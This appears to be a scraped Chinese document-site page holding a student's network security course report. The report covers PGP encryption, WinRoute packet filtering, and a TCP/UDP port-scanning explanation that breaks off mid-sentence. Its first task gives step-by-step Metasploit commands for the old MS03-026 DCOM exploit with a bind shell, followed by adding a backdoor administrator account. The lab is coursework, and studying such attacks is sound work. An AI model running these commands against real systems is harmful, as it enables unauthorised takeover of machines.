- 1、本文档共19页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
秦文陡 网络安全课程设计.doc
《计算机网络安全》课程设计
学院:软件学院
班级:12级网工二班
姓名:秦文陡
学号:105151140263
指导老师:林玉香
1)利用metasploit攻击一台装有IIS5.0的WINDOWS 2000服务器,获得其控制权,并且在其上面建立超级用户,写出整个实施过程。
1、安装metasploit软件,安装完成后打开软件的控制台窗口
2、在窗口控制台界面输入命令“info exploit/windows/dcerpc/ms03_026_dcom”以了解该命令的用法
3、输入命令“use exploit/windows/dcerpc/ms03_026_dcom”使用该程序
4、输入命令“set rhost 目的主机ip地址”
5、输入命令“set PAYLOAD generic/shell_bind_tcp”加载运行程序需要的shellcode
6、输入命令“exploit”执行
7、现在已经进入了目的主机的dos控制界面,输入命令“net user 用户名 密码 / add”添加用户
输入命令“net localgroup 用户名 /add”将用户添加到管理员组
2)使用PGP 加密文件、加密邮件,写出详细的实施过程。
1、安装pgp软件,在安装中选中“NO,i’m a New User”然后“next”至电脑重启
2、由于是第一次安装运行该软件,电脑重启后该软件会自动提示你建立PGP密钥
3、 点击按钮“下一步”,在用户信息对话框中输入相应的姓名和电子邮件地址
4、 在PGP密码输入框中输入8位以上的密码并确认,然后PGP会自动产生PGP密钥
5、 使用PGP可以加密本地文件,右击要加密的文件,选择PGP菜单项的菜单“Encrypt”
6、 系统自动出现对话框,让用户选择要使用的加密密钥,选中一个密钥,点击按钮“OK”
7、 加密邮件:打开outlook,利用Outlook建立邮件,可以选择利用PGP进行加密和签名
3)利用WinRoute对你的主机设置禁用ping探测、禁用FTP访问及禁用HTTP访问,写出详细的实施过程
1、安装winroute软件,安装完成后。以管理员身份运行该软件,初始密码为空
2、该软件运行后,主机将不能上网,点击工具栏图标,出现本地网络设置对话框,然后查看“Ethernet”的属性,将两个复选框全部选中
3、开始创建规则:选择菜单项“Packet Filter”,选中网卡,右击创建新规则,出现过滤规则添加对话框
4、因为“Ping”指令用的协议是ICMP,所以这里要对ICMP协议设置过滤规则。在协议下拉列表中选择“ICMP”
5、在“ICMP Type”栏目中,将复选框全部选中。在“Action”栏目中,选择单选框“Drop”。在“Log Packet”栏目中选中“Log into Window”,创建完毕后点击按钮“OK”,一条规则就创建完毕
6、在物理机上“ping”虚拟机后,再选择菜单栏“View”下的菜单项“LogsSecurity Logs”,察看日志纪录
7、FTP服务用TCP协议, FTP占用TCP的21端口,配置如下:
8. HTTP服务用TCP协议,占用TCP协议的80端口,配置如下:
9、完成后在物理机用浏览器访问虚拟机,查看日志记录:
4)实现端口扫描的程序可以使用TCP协议和UDP协议,原理是通过Socket连接对方的计算机的某端口,试图和该端口建立连接,如果建立成功,就说明对方开放了该端口,如果失败了,就说明对方没有开放该端口,利用UDP协议实现端口扫描(写出程序代码)。
窗体底端
利用TCP和UDP协议
TCP
TCP (Transmission Control Protocol)属于传输层协议。其中TCP提供IP环境下的数据可靠传输,它提供的服务包括数据流传送、可靠性、有效流控、全双工操作和多路复用。通过面向连接、端到端和可靠的数据包发送。通俗说,TCP支持的应用协议主要有:Telnet、FTP、SMTP等
TCP是面向对象的连接,是安全可靠的,是基于连接的协议,也就是说,在正式收发数据前,必须和对方建立可靠的连接。一个TCP连接必须要经过三次“对话”才能建立起来,其中的过程非常复杂,我 们这里只做简单、形象的介绍,你只要做到能够理解这个过程即可。我们来看看这三次对话的简单过程:主机A向主机B发出连接请求数据包:“我想给你发数据, 可以吗?”,这是第一次对话;主机B向主机A发送同意连接和要求同步(同步就是两台主机一个在发送,一个在接收,协调工作)的数据包:“可以,你什么时候 发?”,这是第
您可能关注的文档
最近下载
- 苏教版小学英语3a-5a单词表(2015).doc VIP
- 贵州钢绳(集团)有限责任公司招聘笔试真题2021.docx VIP
- 2025年职业卫生评价考试真题二十 .pdf VIP
- 2025年贵州钢绳集团有限责任公司控股人员招聘笔试备考试题及答案解析.docx VIP
- 全血和各种血液成分的临床应用.ppt VIP
- 软件系统安全保障方案.docx VIP
- 2025年云南省中考地理试卷(含解析).pdf
- 四川省拟任县处级试题 四川省拟任县处级党政领导干部任职资格考试题.doc VIP
- CECS 349-2013 一体化给水处理装置应用技术规程.docx
- 茶皂素杀螺活性及对3种水生生物的安全性.docx
文档评论(0)